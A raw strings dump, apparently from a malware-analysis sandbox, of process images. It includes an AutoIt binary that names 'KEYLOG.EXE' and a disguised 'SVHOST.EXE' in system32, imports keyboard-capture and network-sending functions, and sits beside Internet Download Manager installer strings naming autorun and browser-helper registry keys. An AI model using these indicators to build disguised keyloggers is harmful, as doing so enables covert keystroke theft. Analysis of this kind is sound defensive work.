Null Object assignment in FOR..IN loop
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 12, 0
3, 3, 12, 0
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_USERS
HKEY_USERS
%d/d/d
%d/d/d
C:\Windows\system32\KEYLOG.EXE
C:\Windows\system32\KEYLOG.EXE
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
SVHOST.EXE_3172:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
SSh8*
SSh8*
PSSSSSSh
PSSSSSSh
Gt.Ht$
Gt.Ht$
t.jGZf;
t.jGZf;
PSSShl
PSSShl
PVSShl
PVSShl
j.Zf;
j.Zf;
;K|s%f
;K|s%f
?#%X.y
?#%X.y
GetProcessWindowStation
GetProcessWindowStation
operator
operator
kernel32.dll
kernel32.dll
oleaut32.dll
oleaut32.dll
RegDeleteKeyExW
RegDeleteKeyExW
advapi32.dll
advapi32.dll
Error text not found (please report)
Error text not found (please report)
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
\N is not supported in a class
WSOCK32.dll
WSOCK32.dll
VERSION.dll
VERSION.dll
WINMM.dll
WINMM.dll
COMCTL32.dll
COMCTL32.dll
MPR.dll
MPR.dll
InternetCrackUrlW
InternetCrackUrlW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
FtpOpenFileW
FtpOpenFileW
FtpGetFileSize
FtpGetFileSize
InternetOpenUrlW
InternetOpenUrlW
WININET.dll
WININET.dll
PSAPI.DLL
PSAPI.DLL
IPHLPAPI.DLL
IPHLPAPI.DLL
USERENV.dll
USERENV.dll
UxTheme.dll
UxTheme.dll
GetProcessHeap
GetProcessHeap
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
OpenWindowStationW
OpenWindowStationW
SetProcessWindowStation
SetProcessWindowStation
CloseWindowStation
CloseWindowStation
MapVirtualKeyW
MapVirtualKeyW
EnumChildWindows
EnumChildWindows
EnumWindows
EnumWindows
VkKeyScanW
VkKeyScanW
GetKeyState
GetKeyState
GetKeyboardState
GetKeyboardState
SetKeyboardState
SetKeyboardState
GetAsyncKeyState
GetAsyncKeyState
keybd_event
keybd_event
EnumThreadWindows
EnumThreadWindows
ExitWindowsEx
ExitWindowsEx
UnregisterHotKey
UnregisterHotKey
RegisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GDI32.dll
GDI32.dll
COMDLG32.dll
COMDLG32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHFileOperationW
SHFileOperationW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
n..GGHHH
n..GGHHH
n...GGHHH
n...GGHHH
n ....HGHHHH
n ....HGHHHH
n ....G.HHH
n ....G.HHH
~~~~{~{{{{
~~~~{~{{{{
n!! ....HGHHHH
n!! ....HGHHHH
n!! .....HHHHHH
n!! .....HHHHHH
!!! ....GGHHH
!!! ....GGHHH
!!"".....HHHHnv
!!"".....HHHHnv
"""...-.nv
"""...-.nv
@Þ5
@Þ5
zgg%U
zgg%U
~P].ap
~P].ap
.Oy^U
.Oy^U
Jn)%u9
Jn)%u9
.ANK1
.ANK1
.lz C
.lz C
> >$>(>=>
> >$>(>=>
5o6q6
5o6q6
6!6%6)6-616
6!6%6)6-616
343C3n3v3}3
343C3n3v3}3
:&:*:.:2:
:&:*:.:2:
4#4'4 4/43474;4
4#4'4 4/43474;4
mscoree.dll
mscoree.dll
combase.dll
combase.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
USER32.DLL
USER32.DLL
>>>AUTOIT NO CMDEXECUTE
>>>AUTOIT NO CMDEXECUTE
CMDLINERAW
CMDLINERAW
CMDLINE
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
/AutoIt3ExecuteScript
APPSKEY
APPSKEY
789:;?
789:;?
FTPSETPROXY
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLRECVMSG
GUICTRLSENDMSG
GUICTRLSENDMSG
GUIGETMSG
GUIGETMSG
GUIREGISTERMSG
GUIREGISTERMSG
HOTKEYSET
HOTKEYSET
HTTPSETPROXY
HTTPSETPROXY
HTTPSETUSERAGENT
HTTPSETUSERAGENT
ISKEYWORD
ISKEYWORD
MSGBOX
MSGBOX
REGENUMKEY
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTE
SHELLEXECUTEWAIT
SHELLEXECUTEWAIT
TCPACCEPT
TCPACCEPT
TCPCLOSESOCKET
TCPCLOSESOCKET
TCPCONNECT
TCPCONNECT
TCPLISTEN
TCPLISTEN
TCPNAMETOIP
TCPNAMETOIP
TCPRECV
TCPRECV
TCPSEND
TCPSEND
TCPSHUTDOWN
TCPSHUTDOWN
TCPSTARTUP
TCPSTARTUP
TRAYGETMSG
TRAYGETMSG
UDPBIND
UDPBIND
UDPCLOSESOCKET
UDPCLOSESOCKET
UDPOPEN
UDPOPEN
UDPRECV
UDPRECV
UDPSEND
UDPSEND
UDPSHUTDOWN
UDPSHUTDOWN
UDPSTARTUP
UDPSTARTUP
SendKeyDelay
SendKeyDelay
SendKeyDownDelay
SendKeyDownDelay
TCPTimeout
TCPTimeout
WINDOWSDIR
WINDOWSDIR
AUTOITEXE
AUTOITEXE
HOTKEYPRESSED
HOTKEYPRESSED
%s (%d) : ==> %s.:
%s (%d) : ==> %s.:
Line %d:
Line %d:
Line %d (File "%s"):
Line %d (File "%s"):
%s (%d) : ==> %s:
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
*.au3;*.a3x
All files (*.*)
All files (*.*)
04090000
04090000
%u.%u.%u.%u
%u.%u.%u.%u
0.0.0.0
0.0.0.0
Mddddd
Mddddd
"%s" (%d) : ==> %s:
"%s" (%d) : ==> %s:
\??\%s
\??\%s
GUI_RUNDEFMSG
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
AUTOITCALLVARIABLE%d
255.255.255.255
255.255.255.255
Keyword
Keyword
AUTOIT.ERROR
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 12, 0
3, 3, 12, 0
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_USERS
HKEY_USERS
%d/d/d
%d/d/d
C:\Windows\system32\SVHOST.EXE
C:\Windows\system32\SVHOST.EXE
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
IDM1.tmp_1652:
.text
.text
.rdata
.rdata
@.data
@.data
.rsrc
.rsrc
PSSht
PSSht
PSSh|
PSSh|
SShX*A
SShX*A
PSSSSSSh!
PSSSSSSh!
SSSh,QA
SSSh,QA
COMCTL32.dll
COMCTL32.dll
SHDeleteKeyW
SHDeleteKeyW
SHLWAPI.dll
SHLWAPI.dll
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
MSVCRT.dll
MSVCRT.dll
_wcmdln
_wcmdln
webHancer
webHancer
New.net
New.net
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\FileVersion
%sLanguages\%s
%sLanguages\%s
%sIDM*.*
%sIDM*.*
%sLanguages\inst_*.lng
%sLanguages\inst_*.lng
version="1.0.0.0"
version="1.0.0.0"
name="Tonec.IDM.Uninstall"
name="Tonec.IDM.Uninstall"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
-~>^:]6]6
-~>^:]6]6
91%2%s-
91%2%s-
%XRp1
%XRp1
)~>}:}>
)~>}:}>
-V%U)
-V%U)
%S-q-
%S-q-
-w%U!3
-w%U!3
1%S)S)
1%S)S)
[?_?___?[
[?_?___?[
52%s-'
52%s-'
%S)t)S)
%S)t)S)
%s1t1
%s1t1
[>_?_?_?___?[
[>_?_?_?___?[
^.JsRWNR-
^.JsRWNR-
!%%%)%)%-
!%%%)%)%-
__[?[____
__[?[____
2_*_*_*_*
2_*_*_*_*
!r%3%u!
!r%3%u!
>{:[:|>;6
>{:[:|>;6
696:6:6:6;6;6[6[6[6[6[6\6\6[6\6[6;6
696:6:6:6;6;6[6[6[6[6[6\6\6[6\6[6;6
%t%s!S!R!R!R!S!s%s%
%t%s!S!R!R!R!S!s%s%
Q!R%s%s)
Q!R%s%s)
0!0!0!Q!S%R%s)
0!0!0!Q!S%R%s)
!V)x%x)
!V)x%x)
4%V)4!U%U%
4%V)4!U%U%
2
2
.:2;6]:~>
.:2;6]:~>
2:6;6\:}:
2:6;6\:}:
>|>|:[::6
>|>|:[::6
%u%u!u!U!3
%u%u!u!U!3
12%u1
12%u1
fceb7191-46c6-4fb2-bc5f-a10317cd4b1a
fceb7191-46c6-4fb2-bc5f-a10317cd4b1a
fc21ec12-91cc-4546-8ce9-0fea34ce5ad9
fc21ec12-91cc-4546-8ce9-0fea34ce5ad9
f1b17826-2437-4a4d-a9d0-97ee5c76c164
f1b17826-2437-4a4d-a9d0-97ee5c76c164
db47a145-d5cc-424d-885d-7a305ebc25b0
db47a145-d5cc-424d-885d-7a305ebc25b0
d177c6d9-1454-476c-bcc3-1195d036d6e0
d177c6d9-1454-476c-bcc3-1195d036d6e0
cf2d8c1d-bb0e-4cdc-9e97-3cc6da9f48c7
cf2d8c1d-bb0e-4cdc-9e97-3cc6da9f48c7
cb6498f3-91f5-4e72-bdd3-35e5a6dc6d5f
cb6498f3-91f5-4e72-bdd3-35e5a6dc6d5f
851aba31-d661-4825-a37f-5bd0faeb4d88
851aba31-d661-4825-a37f-5bd0faeb4d88
80993b9b-0cd0-4b2d-864c-88151c635fe5
80993b9b-0cd0-4b2d-864c-88151c635fe5
77e27bc6-988a-4b45-bdf1-85a8928f86ea
77e27bc6-988a-4b45-bdf1-85a8928f86ea
6528e7db-f86d-4398-a3df-abf0e7b70aa2
6528e7db-f86d-4398-a3df-abf0e7b70aa2
64a72197-bda2-449e-ba78-8e0335442661
64a72197-bda2-449e-ba78-8e0335442661
205801ea-84b1-4085-b818-b1c6fb567bd7
205801ea-84b1-4085-b818-b1c6fb567bd7
179619ba-deeb-4436-abaf-82eeaf2f3816
179619ba-deeb-4436-abaf-82eeaf2f3816
144323b7-20c3-4b5f-b2a5-1cd0d6996dbc
144323b7-20c3-4b5f-b2a5-1cd0d6996dbc
02c1811b-6b25-416a-aca8-dc671d68056d
02c1811b-6b25-416a-aca8-dc671d68056d
00645ccd-b777-44a2-9b36-1fb3f423b559
00645ccd-b777-44a2-9b36-1fb3f423b559
NPIDMan2.dll
NPIDMan2.dll
NPIDMan1.dll
NPIDMan1.dll
%sNP_IDM%d.dll
%sNP_IDM%d.dll
{0055C089-8582-441B-A0BF-17B458C2A3A8}
{0055C089-8582-441B-A0BF-17B458C2A3A8}
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
rIDMShellExt.dll
rIDMShellExt.dll
%s\IDMShellExt.dll
%s\IDMShellExt.dll
regsvr32.exe
regsvr32.exe
/u /s IDMShellExt64.dll
/u /s IDMShellExt64.dll
/u /s "%s\IDMShellExt64.dll"
/u /s "%s\IDMShellExt64.dll"
IDMan.exe
IDMan.exe
MozillaFirebird.exe
MozillaFirebird.exe
Mozilla.exe
Mozilla.exe
SOFTWARE\FullCircle\TalkBack\%s
SOFTWARE\FullCircle\TalkBack\%s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Opera Software
Software\Opera Software
MozillaFirebird
MozillaFirebird
mozilla
mozilla
Opera
Opera
firefox
firefox
SOFTWARE\mozilla.org\Mozilla
SOFTWARE\mozilla.org\Mozilla
Mozilla
Mozilla
sporder.dll
sporder.dll
\idmmbc.dll
\idmmbc.dll
Wrpcrt4.dll
Wrpcrt4.dll
%s%s\
%s%s\
%s\settings.bak
%s\settings.bak
%s%sDMCache\%s
%s%sDMCache\%s
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%s%sDMCache
%s%sDMCache
fceb7191-46c6-4fb2-bc5f-000000000000
fceb7191-46c6-4fb2-bc5f-000000000000
%s%sIDMShellExt.dll
%s%sIDMShellExt.dll
/s "%s%sIDMShellExt64.dll"
/s "%s%sIDMShellExt64.dll"
%s %s
%s %s
RUNDLL32.EXE
RUNDLL32.EXE
Sysnative\RUNDLL32.EXE
Sysnative\RUNDLL32.EXE
%s%sIDMIntegrator64.exe
%s%sIDMIntegrator64.exe
SETUPAPI.DLL,InstallHinfSection DefaultUninstall 128 %s
SETUPAPI.DLL,InstallHinfSection DefaultUninstall 128 %s
SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 %s
SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 %s
idmtdi.inf
idmtdi.inf
idmtdi32.sys
idmtdi32.sys
idmwfp.inf
idmwfp.inf
%s%s%s
%s%s%s
idmwfp32.sys
idmwfp32.sys
\\.\IDMTDI
\\.\IDMTDI
\\.\IDMWFP
\\.\IDMWFP
net.exe
net.exe
%s\%s
%s\%s
idmmbc.dll
idmmbc.dll
avwebgrd
avwebgrd
setup_error.log
setup_error.log
Internet Download Manager.lnk
Internet Download Manager.lnk
%s.lnk
%s.lnk
%s\%s\
%s\%s\
IDMSetup2.log
IDMSetup2.log
Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
WVERSION.dll
WVERSION.dll
%s%s%i.tmp
%s%s%i.tmp
%s%i%s
%s%i%s
IDM0.tmp
IDM0.tmp
IDMNetMon64.dll
IDMNetMon64.dll
IDMNetMon.dll
IDMNetMon.dll
\WinInit.Ini
\WinInit.Ini
Error ID: %s
Error ID: %s
%s. %s Error ID=%s
%s. %s Error ID=%s
%s. Error ID=%s
%s. Error ID=%s
It is necessary to install IDM to "%s" folder.
It is necessary to install IDM to "%s" folder.
"%s"?
"%s"?
Please select "Tasks->Exit" (or "URL->Exit" for old versions) menu item in the main IDM window to close Internet Download Manager before proceeding.
Please select "Tasks->Exit" (or "URL->Exit" for old versions) menu item in the main IDM window to close Internet Download Manager before proceeding.
The "Access denied" error occurred while copying main IDM executable file into the specified location!
The "Access denied" error occurred while copying main IDM executable file into the specified location!
Cannot install main IDM executable file! The installation cannot be continued.
Cannot install main IDM executable file! The installation cannot be continued.
Do not cancel Windows dialog of copying files
Do not cancel Windows dialog of copying files
Windows will not be able to register all IDM components in folder
Windows will not be able to register all IDM components in folder
"%s".
"%s".
An unknown error occurred while removing IDM integration from web browsers!
An unknown error occurred while removing IDM integration from web browsers!
An unknown error occurred while removing IDM integration from %s browser. You may need to delete %s file manually
An unknown error occurred while removing IDM integration from %s browser. You may need to delete %s file manually
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\
%sProgram Files\%s
%sProgram Files\%s
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
{59FB2056-D625-48D0-A944-1A85B5AB2640}
{59FB2056-D625-48D0-A944-1A85B5AB2640}
CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\Implemented Categories
CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\Implemented Categories
idmBroker.exe
idmBroker.exe
Software\Mozilla
Software\Mozilla
/s "%s\downlWithIDM64.dll"
/s "%s\downlWithIDM64.dll"
/s "%s\IDMGetAll64.dll"
/s "%s\IDMGetAll64.dll"
/s "%s\IDMIECC64.dll"
/s "%s\IDMIECC64.dll"
%s\idmfsa.dll
%s\idmfsa.dll
%s\downlWithIDM.dll
%s\downlWithIDM.dll
%s\IDMIECC.dll
%s\IDMIECC.dll
%s\IDMGetAll.dll
%s\IDMGetAll.dll
%s\IDManTypeInfo.tlb
%s\IDManTypeInfo.tlb
SOFTWARE\Classes\AppID\%s
SOFTWARE\Classes\AppID\%s
AppID\%s
AppID\%s
CLSID\{AC746233-E9D3-49CD-862F-068F7B7CCCA4}
CLSID\{AC746233-E9D3-49CD-862F-068F7B7CCCA4}
{AC746233-E9D3-49CD-862F-068F7B7CCCA4}
{AC746233-E9D3-49CD-862F-068F7B7CCCA4}
IDMan.CIDMLinkTransmitter
IDMan.CIDMLinkTransmitter
Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{F6E1B27E-F2DA-4919-9DBD-CAB90A1D662B}
Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{F6E1B27E-F2DA-4919-9DBD-CAB90A1D662B}
IEMonitor.exe
IEMonitor.exe
Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}
Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}
Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}
Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}
"%s" /rtr%s%s%s%s%s
"%s" /rtr%s%s%s%s%s
/rbmsg
/rbmsg
/setlngid %d
/setlngid %d
/setlngid %d /fulllngfile %s
